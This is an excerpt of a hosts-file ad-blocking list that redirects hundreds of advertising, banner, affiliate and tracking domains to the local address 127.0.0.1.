127.0.0.1 adriver.ru
127.0.0.1 adroar.com
127.0.0.1 adrotate.de
127.0.0.1 adrotator.net
127.0.0.1 ads-205.quarterserver.de
127.0.0.1 ads-de.spray.net
127.0.0.1 ads.100asians.com
127.0.0.1 ads.5ci.lt
127.0.0.1 ads.aceweb.net
127.0.0.1 ads.adshareware.net
127.0.0.1 ads.adultfriendfinder.com
127.0.0.1 ads.advance.net
127.0.0.1 ads.adverline.com
127.0.0.1 ads.affiliates.match.com
127.0.0.1 ads.allsites.com
127.0.0.1 ads.alwayson-network.com
127.0.0.1 ads.amazingmedia.com
127.0.0.1 ads.amdmb.com
127.0.0.1 ads.aol.com
127.0.0.1 ads.as4x.tmcs.net
127.0.0.1 ads.asia1.com.sg
127.0.0.1 ads.asiafriendfinder.com
127.0.0.1 ads.aspalliance.com
127.0.0.1 ads.battle.net
127.0.0.1 ads.belointeractive.com
127.0.0.1 ads.berlinonline.de
127.0.0.1 ads.betanews.com
127.0.0.1 ads.bfast.com
127.0.0.1 ads.bigcitytools.com
127.0.0.1 ads.bigfoot.com
127.0.0.1 ads.billiton.de
127.0.0.1 ads.bitsonthewire.com
127.0.0.1 ads.blick.ch
127.0.0.1 ads.bloomberg.com
127.0.0.1 ads.bluemountain.com
127.0.0.1 ads.box.sk
127.0.0.1 ads.businessweek.com
127.0.0.1 ads.canalblog.com
127.0.0.1 ads.canoe.ca
127.0.0.1 ads.cavello.com
127.0.0.1 ads.cbc.ca
127.0.0.1 ads.cdfreaks.com
127.0.0.1 ads.centraliprom.com
127.0.0.1 ads.cgnetworks.com
127.0.0.1 ads.channel4.com
127.0.0.1 ads.cimedia.com
127.0.0.1 ads.clearchannel.com
127.0.0.1 ads.collegclub.com
127.0.0.1 ads.com.com
127.0.0.1 ads.currantbun.com
127.0.0.1 ads.cyberfight.ru
127.0.0.1 ads.cybersales.cz
127.0.0.1 ads.danworld.net
127.0.0.1 ads.datingyes.com
127.0.0.1 ads.dbforums.com
127.0.0.1 ads.ddj.com
127.0.0.1 ads.deltha.hu
127.0.0.1 ads.dennisnet.co.uk
127.0.0.1 ads.desmoinesregister.com
127.0.0.1 ads.detelefoongids.nl
127.0.0.1 ads.developershed.com
127.0.0.1 ads.deviantart.com
127.0.0.1 ads.digitalmedianet.com
127.0.0.1 ads.digitalpoint.com
127.0.0.1 ads.directionsmag.com
127.0.0.1 ads.discovery.com
127.0.0.1 ads.dk
127.0.0.1 ads.dmk-internet.com
127.0.0.1 ads.e-planning.net
127.0.0.1 ads.edbindex.dk
127.0.0.1 ads.einmedia.com
127.0.0.1 ads.erotism.com
127.0.0.1 ads.esmas.com
127.0.0.1 ads.eu.msn.com
127.0.0.1 ads.eudora.com
127.0.0.1 ads.exhedra.com
127.0.0.1 ads.ezboard.com
127.0.0.1 ads.fairfax.com.au
127.0.0.1 ads.filmup.com
127.0.0.1 ads.firingsquad.com
127.0.0.1 ads.flooble.com
127.0.0.1 ads.floridatoday.com
127.0.0.1 ads.fool.com
127.0.0.1 ads.forbes.com
127.0.0.1 ads.forbes.net
127.0.0.1 ads.forium.de
127.0.0.1 ads.fortunecity.com
127.0.0.1 ads.foxkidseurope.net
127.0.0.1 ads.freecity.de
127.0.0.1 ads.freeze.com
127.0.0.1 ads.friendtest.com
127.0.0.1 ads.ft.com
127.0.0.1 ads.g4techtv.com
127.0.0.1 ads.game.net
127.0.0.1 ads.gamecity.net
127.0.0.1 ads.gamecopyworld.no
127.0.0.1 ads.gameforgeads.de
127.0.0.1 ads.gamershell.com
127.0.0.1 ads.gamespy.com
127.0.0.1 ads.gamespyid.com
127.0.0.1 ads.gamigo.de
127.0.0.1 ads.gawker.com
127.0.0.1 ads.gettools.com
127.0.0.1 ads.globeandmail.com
127.0.0.1 ads.gotfrag.com
127.0.0.1 ads.goyk.com
127.0.0.1 ads.grindinggears.com
127.0.0.1 ads.guardian.co.uk
127.0.0.1 ads.guardianunlimited.co.uk
127.0.0.1 ads.hbv.de
127.0.0.1 ads.heartlight.org
127.0.0.1 ads.herald-sun.com
127.0.0.1 ads.hollywood.com
127.0.0.1 ads.humorbua.no
127.0.0.1 ads.iafrica.com
127.0.0.1 ads.iboost.com
127.0.0.1 ads.icq.com
127.0.0.1 ads.ign.com
127.0.0.1 ads.imdb.com
127.0.0.1 ads.img.co.za
127.0.0.1 ads.indya.com
127.0.0.1 ads.indystar.com
127.0.0.1 ads.inetfast.com
127.0.0.1 ads.inetinteractive.com
127.0.0.1 ads.infi.net
127.0.0.1 ads.infospace.com
127.0.0.1 ads.internic.co.il
127.0.0.1 ads.inthemix.com.au
127.0.0.1 ads.ipowerweb.com
127.0.0.1 ads.isoftmarketing.com
127.0.0.1 ads.itv.com
127.0.0.1 ads.iwon.com
127.0.0.1 ads.jimworld.com
127.0.0.1 ads.jpost.com
127.0.0.1 ads.jubii.dk
127.0.0.1 ads.katz.ws
127.0.0.1 ads.kinobox.cz
127.0.0.1 ads.krawall.de
127.0.0.1 ads.leo.org
127.0.0.1 ads.linuxjournal.com
127.0.0.1 ads.linuxquestions.org
127.0.0.1 ads.linuxsecurity.com
127.0.0.1 ads.lnkworld.com
127.0.0.1 ads.localnow.com
127.0.0.1 ads.lycos-europe.com
127.0.0.1 ads.lycos.com
127.0.0.1 ads.madison.com
127.0.0.1 ads.mariuana.it
127.0.0.1 ads.mcafee.com
127.0.0.1 ads.mediaodyssey.com
127.0.0.1 ads.mediaturf.net
127.0.0.1 ads.metropol.dk
127.0.0.1 ads.mgnetwork.com
127.0.0.1 ads.monster.com
127.0.0.1 ads.msn.com
127.0.0.1 ads.multimania.lycos.fr
127.0.0.1 ads.musiccity.com
127.0.0.1 ads.myguysolutions.com
127.0.0.1 ads.mysimon.com
127.0.0.1 ads.nandomedia.com
127.0.0.1 ads.nationalreview.com
127.0.0.1 ads.neoseeker.com
127.0.0.1 ads.neowin.net
127.0.0.1 ads.netmechanic.com
127.0.0.1 ads.newcity.com
127.0.0.1 ads.newcitynet.com
127.0.0.1 ads.newdream.net
127.0.0.1 ads.newmedia.cz
127.0.0.1 ads.newsint.co.uk
127.0.0.1 ads.newsobserver.com
127.0.0.1 ads.newsquest.co.uk
127.0.0.1 ads.newtimes.com
127.0.0.1 ads.ngenuity.com
127.0.0.1 ads.ninemsn.com.au
127.0.0.1 ads.nola.com
127.0.0.1 ads.nordichardware.se
127.0.0.1 ads.ntadvice.com
127.0.0.1 ads.nwsource.com
127.0.0.1 ads.nyi.net
127.0.0.1 ads.nyjournalnews.com
127.0.0.1 ads.nypost.com
127.0.0.1 ads.nytimes.com
127.0.0.1 ads.nzcity.co.nz
127.0.0.1 ads.ole.com
127.0.0.1 ads.oneplace.com
127.0.0.1 ads.onlineguiden.com
127.0.0.1 ads.optusnet.com.au
127.0.0.1 ads.orsm.net
127.0.0.1 ads.osdn.com
127.0.0.1 ads.osnews.com
127.0.0.1 ads.ourbrisbane.com
127.0.0.1 ads.overclockers.at
127.0.0.1 ads.pcper.com
127.0.0.1 ads.peel.com
127.0.0.1 ads.phparena.net
127.0.0.1 ads.phpclasses.org
127.0.0.1 ads.pittsburghlive.com
127.0.0.1 ads.planet.nl
127.0.0.1 ads.pni.com
127.0.0.1 ads.powweb.com
127.0.0.1 ads.premiumnetwork.com
127.0.0.1 ads.primeinteractive.net
127.0.0.1 ads.prisacom.com
127.0.0.1 ads.pro-market.net
127.0.0.1 ads.realcities.com
127.0.0.1 ads.realmedia.de
127.0.0.1 ads.recoletos.es
127.0.0.1 ads.rediff.com
127.0.0.1 ads.rivals.net
127.0.0.1 ads.rottentomatoes.com
127.0.0.1 ads.rp-online.de
127.0.0.1 ads.rpgdot.com
127.0.0.1 ads.rpgui.com
127.0.0.1 ads.satyamonline.com
127.0.0.1 ads.savannahnow.com
127.0.0.1 ads.scifi.com
127.0.0.1 ads.sexplanets.com
127.0.0.1 ads.shareprovider.com
127.0.0.1 ads.sify.com
127.0.0.1 ads.simtel.net
127.0.0.1 ads.smartclick.com
127.0.0.1 ads.softwareoutfit.com
127.0.0.1 ads.space.com
127.0.0.1 ads.sptimes.com
127.0.0.1 ads.stationplay.com
127.0.0.1 ads.stileproject.com
127.0.0.1 ads.storagereview.net
127.0.0.1 ads.stratics.com
127.0.0.1 ads.switchboard.com
127.0.0.1 ads.techtv.com
127.0.0.1 ads.telegraaf.nl
127.0.0.1 ads.telegraph.co.uk
127.0.0.1 ads.theglobeandmail.com
127.0.0.1 ads.thestar.com
127.0.0.1 ads.thewebfreaks.com
127.0.0.1 ads.thottbot.com
127.0.0.1 ads.tiscali.fr
127.0.0.1 ads.tmcs.net
127.0.0.1 ads.top500.org
127.0.0.1 ads.townhall.com
127.0.0.1 ads.tripod.com
127.0.0.1 ads.tripod.lycos.co.uk
127.0.0.1 ads.tripod.lycos.de
127.0.0.1 ads.tripod.lycos.nl
127.0.0.1 ads.tucows.com
127.0.0.1 ads.ucomics.com
127.0.0.1 ads.uigc.net
127.0.0.1 ads.unixathome.org
127.0.0.1 ads.urli.net
127.0.0.1 ads.usatoday.com
127.0.0.1 ads.v3.com
127.0.0.1 ads.v3exchange.com
127.0.0.1 ads.vesperexchange.com
127.0.0.1 ads.videoaxs.com
127.0.0.1 ads.virtual-nights.com
127.0.0.1 ads.virtualcountries.com
127.0.0.1 ads.vnuemedia.com
127.0.0.1 ads.vnumedia.com
127.0.0.1 ads.wanadooregie.com
127.0.0.1 ads.weather.ca
127.0.0.1 ads.weather.com
127.0.0.1 ads.web.aol.com
127.0.0.1 ads.web.cs.com
127.0.0.1 ads.web.de
127.0.0.1 ads.web21.com
127.0.0.1 ads.webattack.com
127.0.0.1 ads.webheat.com
127.0.0.1 ads.webnet.advance.net
127.0.0.1 ads.whi.co.nz
127.0.0.1 ads.winsite.com
127.0.0.1 ads.wunderground.com
127.0.0.1 ads.x10.com
127.0.0.1 ads.x10.net
127.0.0.1 ads.xtra.co.nz
127.0.0.1 ads.yourfreedvds.com
127.0.0.1 ads.zdnet.com
127.0.0.1 ads001.webwombat.com.au
127.0.0.1 ads1.advance.net
127.0.0.1 ads1.akkuna.com
127.0.0.1 ads1.canoe.ca
127.0.0.1 ads1.erotism.com
127.0.0.1 ads1.mediacapital.pt
127.0.0.1 ads1.sptimes.com
127.0.0.1 ads1.theglobeandmail.com
127.0.0.1 ads10.speedbit.com
127.0.0.1 ads2.advance.net
127.0.0.1 ads2.akkuna.com
127.0.0.1 ads2.clearchannel.com
127.0.0.1 ads2.collegclub.com
127.0.0.1 ads2.collegeclub.com
127.0.0.1 ads2.exhedra.com
127.0.0.1 ads2.firingsquad.com
127.0.0.1 ads2.gamecity.net
127.0.0.1 ads2.jubii.dk
127.0.0.1 ads2.oneplace.com
127.0.0.1 ads2.osdn.com
127.0.0.1 ads2.top500.org
127.0.0.1 ads3.advance.net
127.0.0.1 ads3.gamecity.net
127.0.0.1 ads360.com
127.0.0.1 ads4.advance.net
127.0.0.1 ads4.clearchannel.com
127.0.0.1 ads4.gamecity.net
127.0.0.1 ads4.realcities.com
127.0.0.1 ads4homes.com
127.0.0.1 ads5.advance.net
127.0.0.1 ads5.canoe.ca
127.0.0.1 ads6.advance.net
127.0.0.1 ads6.gamecity.net
127.0.0.1 ads7.gamecity.net
127.0.0.1 ads8.com
127.0.0.1 adsag.com
127.0.0.1 Adsatt.ABCNews.starwave.com
127.0.0.1 adsatt.espn.go.com
127.0.0.1 adsatt.espn.starwave.com
127.0.0.1 Adsatt.go.starwave.com
127.0.0.1 adscholar.com
127.0.0.1 adscpm.com
127.0.0.1 adsdaq.com
127.0.0.1 adserv.aip.org
127.0.0.1 adserv.gamezone.de
127.0.0.1 adserv.geocomm.com
127.0.0.1 adserv.happypuppy.com
127.0.0.1 adserv.iafrica.com
127.0.0.1 adserv.lwmn.net
127.0.0.1 adserv.quality-channel.de
127.0.0.1 adserv1.winboard.org
127.0.0.1 adserve.viaarena.com
127.0.0.1 adserver.71i.de
127.0.0.1 adserver.adultfriendfinder.com
127.0.0.1 adserver.allerinternett.com
127.0.0.1 adserver.anm.co.uk
127.0.0.1 adserver.ath.cx
127.0.0.1 adserver.billiger-surfen.de
127.0.0.1 adserver.billiger-telefonieren.de
127.0.0.1 adserver.bluewin.ch
127.0.0.1 adserver.colleges.com
127.0.0.1 adserver.com
127.0.0.1 adserver.conjelco.com
127.0.0.1 adserver.developersnetwork.com
127.0.0.1 adserver.digitoday.com
127.0.0.1 adserver.dotcommedia.de
127.0.0.1 adserver.eudora.com
127.0.0.1 adserver.filefront.com
127.0.0.1 adserver.freecity.de
127.0.0.1 adserver.freenet.de
127.0.0.1 adserver.friendfinder.com
127.0.0.1 adserver.gamesquad.net
127.0.0.1 adserver.garden.com
127.0.0.1 adserver.geizkragen.de
127.0.0.1 adserver.gr
127.0.0.1 adserver.hardwareanalysis.com
127.0.0.1 adserver.hispavista.com
127.0.0.1 adserver.humanux.com
127.0.0.1 adserver.ign.com
127.0.0.1 adserver.isonews.com
127.0.0.1 adserver.itsfogo.com
127.0.0.1 adserver.janes.com
127.0.0.1 adserver.jolt.co.uk
127.0.0.1 adserver.journalinteractive.com
127.0.0.1 adserver.legacy-network.com
127.0.0.1 adserver.libero.it
127.0.0.1 adserver.m2kcore.com
127.0.0.1 adserver.monster.com
127.0.0.1 adserver.news.com.au
127.0.0.1 adserver.ngz-network.de
127.0.0.1 adserver.nydailynews.com
127.0.0.1 adserver.nzoom.com
127.0.0.1 adserver.pl
127.0.0.1 adserver.plhb.com
127.0.0.1 adserver.portalofevil.com
127.0.0.1 adserver.portugalmail.net
127.0.0.1 adserver.portugalmail.pt
127.0.0.1 adserver.ro
127.0.0.1 adserver.sanomawsoy.fi
127.0.0.1 adserver.securityfocus.com
127.0.0.1 adserver.sharewareonline.com
127.0.0.1 adserver.snowball.com
127.0.0.1 adserver.startnow.com
127.0.0.1 adserver.terra.es
127.0.0.1 adserver.theonering.net
127.0.0.1 adserver.track-star.com
127.0.0.1 adserver.trb.com
127.0.0.1 adserver.tribuneinteractive.com
127.0.0.1 adserver.ugo.com
127.0.0.1 adserver.usermagnet.com
127.0.0.1 adserver.visions.de
127.0.0.1 adserver.webhostlist.de
127.0.0.1 adserver.yahoo.com
127.0.0.1 adserver1-images.backbeatmedia.com
127.0.0.1 adserver1.backbeatmedia.com
127.0.0.1 adserver1.mediainsight.de
127.0.0.1 adserver1.ogilvy-interactive.de
127.0.0.1 adserver1.shareconnector.com
127.0.0.1 adserver2.mediainsight.de
127.0.0.1 adserver2.popdata.de
127.0.0.1 adserver3.eudora.com
127.0.0.1 adserver4.eudora.com
127.0.0.1 adserversolutions.com
127.0.0.1 adservervv.geizkragen.de
127.0.0.1 adserving.eleven-agency.com
127.0.0.1 adservingcentral.com
127.0.0.1 adsfac.net
127.0.0.1 adshadow.net
127.0.0.1 adsmart.co.uk
127.0.0.1 adsmart.com
127.0.0.1 adsmart.net
127.0.0.1 adsmusic.com
127.0.0.1 adsnew.userfriendly.org
127.0.0.1 adsoftware.com
127.0.0.1 adsoldier.com
127.0.0.1 adsp.ilse.nl
127.0.0.1 adspace.ro
127.0.0.1 adsremote.scripps.com
127.0.0.1 adsrv.iol.co.za
127.0.0.1 adsweb.tiscali.cz
127.0.0.1 adsynergy.com
127.0.0.1 adsystem.tt-forums.net
127.0.0.1 adtech.de
127.0.0.1 adtech.m7z.net
127.0.0.1 adtoma.com
127.0.0.1 adtrade.net
127.0.0.1 adtrading.de
127.0.0.1 adtrak.net
127.0.0.1 adtrix.com
127.0.0.1 adv-banner.libero.it
127.0.0.1 adv.for-ua.com
127.0.0.1 adv.freeonline.it
127.0.0.1 adv.hwupgrade.it
127.0.0.1 adv.isdn.cz
127.0.0.1 adv.surinter.net
127.0.0.1 adv.webmd.com
127.0.0.1 adv.wp.pl
127.0.0.1 adv.yo.cz
127.0.0.1 adv1.videoprofessor.com
127.0.0.1 advariant.com
127.0.0.1 adventory.com
127.0.0.1 adverity.com
127.0.0.1 adverserve.net
127.0.0.1 advert.bayarea.com
127.0.0.1 advert.hi-media.com
127.0.0.1 advert.hu
127.0.0.1 adverticum.com
127.0.0.1 adverticum.net
127.0.0.1 advertiseireland.com
127.0.0.1 advertising.com
127.0.0.1 advertising.se
127.0.0.1 advertisingbanners.com
127.0.0.1 advertmarket.com
127.0.0.1 advertmedia.de
127.0.0.1 advertpro.sitepoint.com
127.0.0.1 adverts.carltononline.com
127.0.0.1 advertserve.com
127.0.0.1 advertwizard.com
127.0.0.1 adview.ppro.de
127.0.0.1 adviva.net
127.0.0.1 advlab.it
127.0.0.1 advnt.com
127.0.0.1 advnt01.com
127.0.0.1 advnt02.com
127.0.0.1 advnt03.com
127.0.0.1 advnt04.com
127.0.0.1 advspot.com
127.0.0.1 adware.hu
127.0.0.1 adwealth.com
127.0.0.1 adweb.integctr.com
127.0.0.1 adworldnetwork.com
127.0.0.1 adworx.at
127.0.0.1 adx.allstar.cz
127.0.0.1 adx.arip.co.th
127.0.0.1 adx.atnext.com
127.0.0.1 adx.nu
127.0.0.1 ady.arip.co.th
127.0.0.1 adz.afterdawn.net
127.0.0.1 affiliate.1800flowers.com
127.0.0.1 affiliate.7host.com
127.0.0.1 affiliate.cfdebt.com
127.0.0.1 affiliate.doubleyourdating.com
127.0.0.1 affiliate.dtiserv.com
127.0.0.1 affiliate.gamestop.com
127.0.0.1 affiliate.grasscity.com
127.0.0.1 affiliate.travelnow.com
127.0.0.1 affiliate.viator.com
127.0.0.1 affiliatefuel.com
127.0.0.1 affiliates.allposters.com
127.0.0.1 affiliates.internationaljock.com
127.0.0.1 affiliatetracking.net
127.0.0.1 affiliplus.de
127.0.0.1 afiliados.submarino.com.br
127.0.0.1 ah-ha.com
127.0.0.1 aim4media.com
127.0.0.1 alladvantage.com
127.0.0.1 amedia.techies.com
127.0.0.1 app.lstdesign.com
127.0.0.1 arc1.msn.com
127.0.0.1 as.cmpnet.com
127.0.0.1 as.fotexnet.hu
127.0.0.1 as1.falkag.de
127.0.0.1 as2.falkag.de
127.0.0.1 as3.falkag.de
127.0.0.1 as4.falkag.de
127.0.0.1 as5000.com
127.0.0.1 asv.gameplanet.co.nz
127.0.0.1 atdmt.com
127.0.0.1 atwola.com
127.0.0.1 audit.median.hu
127.0.0.1 audit.webinform.hu
127.0.0.1 autohits.dk
127.0.0.1 avatarresources.com
127.0.0.1 avenuea.com
127.0.0.1 avres.net
127.0.0.1 awarez.net
127.0.0.1 awrz.net
127.0.0.1 azjmp.com
127.0.0.1 azoogleads.com
127.0.0.1 babs.tv2.dk
127.0.0.1 backbeatmedia.com
127.0.0.1 banerovec.cz
127.0.0.1 banex.cz
127.0.0.1 banik.redigy.cz
127.0.0.1 banman.cz
127.0.0.1 banner.ad.nu
127.0.0.1 banner.buempliz-online.ch
127.0.0.1 banner.casino.net
127.0.0.1 banner.casinodelrio.com
127.0.0.1 banner.coza.com
127.0.0.1 banner.cz
127.0.0.1 banner.easyspace.com
127.0.0.1 banner.elisa.net
127.0.0.1 banner.getgo.de
127.0.0.1 banner.img.co.za
127.0.0.1 banner.inyourpocket.com
127.0.0.1 banner.jobsahead.com
127.0.0.1 banner.kiev.ua
127.0.0.1 banner.linux.se
127.0.0.1 banner.media-system.de
127.0.0.1 banner.mindshare.de
127.0.0.1 banner.musikmedia.de
127.0.0.1 banner.nixnet.cz
127.0.0.1 banner.noblepoker.com
127.0.0.1 banner.northsky.com
127.0.0.1 banner.orb.net
127.0.0.1 banner.penguin.cz
127.0.0.1 banner.relcom.ru
127.0.0.1 banner.rojakpot.com
127.0.0.1 banner.t-online.de
127.0.0.1 banner.tanto.de
127.0.0.1 banner.tpage.com
127.0.0.1 banner.webmersion.com
127.0.0.1 banner4all.dk
127.0.0.1 bannerads.de
127.0.0.1 bannerads.zwire.com
127.0.0.1 bannerbank.ru
127.0.0.1 bannerbox.hu
127.0.0.1 bannerboxes.com
127.0.0.1 bannercommunity.de
127.0.0.1 bannerexchange.cjb.net
127.0.0.1 bannerhost.com
127.0.0.1 bannerhosts.com
127.0.0.1 bannerimage.com
127.0.0.1 bannerlandia.com.ar
127.0.0.1 bannermall.com
127.0.0.1 bannermarkt.nl
127.0.0.1 bannerpower.com
127.0.0.1 banners.adultfriendfinder.com
127.0.0.1 banners.amigos.com
127.0.0.1 banners.arachne.cz
127.0.0.1 banners.asiafriendfinder.com
127.0.0.1 banners.babylon-x.com
127.0.0.1 banners.babylonbucks.com
127.0.0.1 banners.bol.com.br
127.0.0.1 banners.clubseventeen.com
127.0.0.1 banners.czi.cz
127.0.0.1 banners.de.clara.net
127.0.0.1 banners.directnic.com
127.0.0.1 banners.dot.tk
127.0.0.1 banners.easydns.com
127.0.0.1 banners.ebay.com
127.0.0.1 banners.freett.com
127.0.0.1 banners.friendfinder.com
127.0.0.1 banners.friendsfinder.com
127.0.0.1 banners.hetnet.nl
127.0.0.1 banners.internetsexprovider.com
127.0.0.1 banners.iq.pl
127.0.0.1 banners.isoftmarketing.com
127.0.0.1 banners.kfmb.com
127.0.0.1 banners.lifeserv.com
127.0.0.1 banners.linkbuddies.com
127.0.0.1 banners.netcraft.com
127.0.0.1 banners.one2one.com
127.0.0.1 banners.resultonline.com
127.0.0.1 banners.sexsearch.com
127.0.0.1 banners.tucson.com
127.0.0.1 banners.uk.clara.net
127.0.0.1 banners.wunderground.com
127.0.0.1 bannerserver.com
127.0.0.1 bannerserver.gator.com
127.0.0.1 bannersgomlm.com
127.0.0.1 bannersng.yell.com
127.0.0.1 bannerspace.com
127.0.0.1 bannerswap.com
127.0.0.1 bannertesting.com
127.0.0.1 bannieres.acces-contenu.com
127.0.0.1 bans.bride.ru
127.0.0.1 bansrv1.n1media.com
127.0.0.1 barnesandnoble.bfast.com
127.0.0.1 bbmedia.cz
127.0.0.1 bbn.img.com.ua
127.0.0.1 bestsearch.net
127.0.0.1 bidclix.com
127.0.0.1 bidclix.net
127.0.0.1 bigads.guj.de
127.0.0.1 bigbangmedia.com
127.0.0.1 billboard.cz
127.0.0.1 bizad.nikkeibp.co.jp
127.0.0.1 bizban.net
127.0.0.1 blast4traffic.com
127.0.0.1 blazefind.com
127.0.0.1 blogads.com
127.0.0.1 bluehavenmedia.com
127.0.0.1 bluestreak.com
127.0.0.1 bm.annonce.cz
127.0.0.1 bn.bfast.com
127.0.0.1 bnr.volgocity.ru
127.0.0.1 boom.ro
127.0.0.1 bpath.com
127.0.0.1 bravenet.com
127.0.0.1 bridgetrack.com
127.0.0.1 british-banners.com
127.0.0.1 bs.yandex.ru
127.0.0.1 bs001.gmx.net
127.0.0.1 bs002.gmx.net
127.0.0.1 bs003.gmx.net
127.0.0.1 bs004.gmx.net
127.0.0.1 bs005.gmx.net
127.0.0.1 bs006.gmx.net
127.0.0.1 bs007.gmx.net
127.0.0.1 bs008.gmx.net
127.0.0.1 bs009.gmx.net
127.0.0.1 bs010.gmx.net
127.0.0.1 bs011.gmx.net
127.0.0.1 bs012.gmx.net
127.0.0.1 bs013.gmx.net
127.0.0.1 bs014.gmx.net
127.0.0.1 bs015.gmx.net
127.0.0.1 bs016.gmx.net
127.0.0.1 bs017.gmx.net
127.0.0.1 bs018.gmx.net
127.0.0.1 bs019.gmx.net
127.0.0.1 bs020.gmx.net
127.0.0.1 bs021.gmx.net
127.0.0.1 bs022.gmx.net
127.0.0.1 bs023.gmx.net
127.0.0.1 bs024.gmx.net
127.0.0.1 bs025.gmx.net
127.0.0.1 bs026.gmx.net
127.0.0.1 bs027.gmx.net
127.0.0.1 bs028.gmx.net
127.0.0.1 bs029.gmx.net
127.0.0.1 bs030.gmx.net
127.0.0.1 bs031.gmx.net
127.0.0.1 bs032.gmx.net
127.0.0.1 bs033.gmx.net
127.0.0.1 bs034.gmx.net
127.0.0.1 bs035.gmx.net
127.0.0.1 bs036.gmx.net
127.0.0.1 bs037.gmx.net
127.0.0.1 bs038.gmx.net
127.0.0.1 bs039.gmx.net
127.0.0.1 bs040.gmx.net
127.0.0.1 bs041.gmx.net
127.0.0.1 bs042.gmx.net
127.0.0.1 bs043.gmx.net
127.0.0.1 bs044.gmx.net
127.0.0.1 bs045.gmx.net
127.0.0.1 bs046.gmx.net
127.0.0.1 bs047.gmx.net
127.0.0.1 bs048.gmx.net
127.0.0.1 bs049.gmx.net
127.0.0.1 budsinc.com
127.0.0.1 burstnet.akadns.net
127.0.0.1 burstnet.com
127.0.0.1 businessfactory.prospero.com
127.0.0.1 c.bigmir.net
127.0.0.1 c1.nowlinux.com
127.0.0.1 candidclicks.com
127.0.0.1 casalemedia.com
127.0.0.1 casalmedia.com
127.0.0.1 cash4banner.com
127.0.0.1 cash4banner.de
127.0.0.1 cash4popup.de
127.0.0.1 cashfiesta.com
127.0.0.1 cashpartner.com
127.0.0.1 cashpartner.net
127.0.0.1 casinogames.com
127.0.0.1 casinorewards.com
127.0.0.1 casinotraffic.com
127.0.0.1 casinotreasure.com
127.0.0.1 cat.clx.ru
127.0.0.1 cben1.net
127.0.0.1 cbx.net
127.0.0.1 cdn2.adsdk.com
127.0.0.1 centrport.net
127.0.0.1 cgicounter.puretec.de
127.0.0.1 ch.questionmarket.com
127.0.0.1 chart.dk
127.0.0.1 checkm8.com
127.0.0.1 chestionar.ro
127.0.0.1 ciaoclick.com
127.0.0.1 cibleclick.com
127.0.0.1 cityads.telus.net
127.0.0.1 cj.com
127.0.0.1 cjbmanagement.com
127.0.0.1 claria.com
127.0.0.1 click-fr.com
127.0.0.1 click.absoluteagency.com
127.0.0.1 click.fool.co.uk
127.0.0.1 click.fool.com
127.0.0.1 click.go2net.com
127.0.0.1 click2freemoney.com
127.0.0.1 click2paid.com
127.0.0.1 click4click.com
127.0.0.1 clickability.com
127.0.0.1 clickagents.com
127.0.0.1 clickbank.com
127.0.0.1 clickbank.net
127.0.0.1 clickbroker.com
127.0.0.1 clickbrokers.com
127.0.0.1 clickcash.webpower.com
127.0.0.1 clickedyclick.com
127.0.0.1 clickfinders.com
127.0.0.1 clickforwebmasters.com
127.0.0.1 clickhere.foronlinegames.com
127.0.0.1 clickhereforcellphones.com
127.0.0.1 clickhouse.com
127.0.0.1 clickhype.com
127.0.0.1 clickmedia.ro
127.0.0.1 clicks.equantum.com
127.0.0.1 clicks.jackpot.com
127.0.0.1 clicks.mods.de
127.0.0.1 clicks.stripsaver.com
127.0.0.1 clickserve.cc-dt.com
127.0.0.1 clicksor.com
127.0.0.1 clickthrutraffic.com
127.0.0.1 clicktracks.com
127.0.0.1 clicktrade.com
127.0.0.1 clickxchange.com
127.0.0.1 clickz.com
127.0.0.1 clictrafic.com
127.0.0.1 clients.tbo.com
127.0.0.1 clixgalore.com
127.0.0.1 cnt.one.ru
127.0.0.1 cnt1.pocitadlo.cz
127.0.0.1 code-server.biz
127.0.0.1 colonize.com
127.0.0.1 comclick.com
127.0.0.1 commission-junction.com
127.0.0.1 commissionmonster.com
127.0.0.1 commonname.com
127.0.0.1 compactbanner.com
127.0.0.1 comprabanner.it
127.0.0.1 contextclick.com
127.0.0.1 cookies.cmpnet.com
127.0.0.1 cornflakes.pathfinder.com
127.0.0.1 count.rin.ru
127.0.0.1 counted.com
127.0.0.1 counter.bloke.com
127.0.0.1 counter.cnw.cz
127.0.0.1 counter.cz
127.0.0.1 counter.nowlinux.com
127.0.0.1 counter.rambler.ru
127.0.0.1 counter.search.bg
127.0.0.1 counter.times.lv
127.0.0.1 counter.webtrends.net
127.0.0.1 counter.yadro.ru
127.0.0.1 counters.honesty.com
127.0.0.1 counts.tucows.com
127.0.0.1 coupling-media.de
127.0.0.1 crazypopups.com
127.0.0.1 creative.whi.co.nz
127.0.0.1 creatives.as4x.tmcs.net
127.0.0.1 cserver.mii.instacontent.net
127.0.0.1 ctnetwork.hu
127.0.0.1 ctxtads.overture.com
127.0.0.1 custom-click.com
127.0.0.1 customad.cnn.com
127.0.0.1 cyberbounty.com
127.0.0.1 cybercount.com
127.0.0.1 cybereps.com
127.0.0.1 cybermonitor.com
127.0.0.1 cydoor.com
127.0.0.1 datingadvertising.com
127.0.0.1 dbbsrv.com
127.0.0.1 dcad.tnn.net
127.0.0.1 dclk.net
127.0.0.1 de.rottentomatoes.com
127.0.0.1 dealhelper.com
127.0.0.1 default-homepage-network.com
127.0.0.1 deloo.de
127.0.0.1 desktop.kazaa.com
127.0.0.1 dgm2.com
127.0.0.1 dgmaustralia.com
127.0.0.1 dialerporn.com
127.0.0.1 didtheyreadit.com
127.0.0.1 digits.com
127.0.0.1 direct-revenue.com
127.0.0.1 direct.lbe.ru
127.0.0.1 directleads.com
127.0.0.1 directtrack.com
127.0.0.1 directwebsearch.net
127.0.0.1 discountclick.com
127.0.0.1 divicash.com
127.0.0.1 dnads.directnic.com
127.0.0.1 domainsponsor.com
127.0.0.1 domainsteam.de
127.0.0.1 doubleclic.com
127.0.0.1 doubleclick.com
127.0.0.1 doubleclick.de
127.0.0.1 doubleclick.net
127.0.0.1 drinkmy.com
127.0.0.1 dw.com.com
127.0.0.1 e-bannerx.com
127.0.0.1 e2give.com
127.0.0.1 eadexchange.com
127.0.0.1 eads.com
127.0.0.1 ecoupons.com
127.0.0.1 elitetoplist.com
127.0.0.1 emarketer.com
127.0.0.1 emarketmakers.com
127.0.0.1 engage.everyone.net
127.0.0.1 engage.omaha.com
127.0.0.1 engine.awaps.net
127.0.0.1 engine.espace.netavenir.com
127.0.0.1 enginenetwork.com
127.0.0.1 entercasino.com
127.0.0.1 erotic-ad.com
127.0.0.1 escati.linkopp.net
127.0.0.1 eshopads2.com
127.0.0.1 espotting.com
127.0.0.1 estats.com
127.0.0.1 etracker.de
127.0.0.1 eu-adcenter.net
127.0.0.1 euniverseads.com
127.0.0.1 euro4banner.com
127.0.0.1 europeanbanners.com
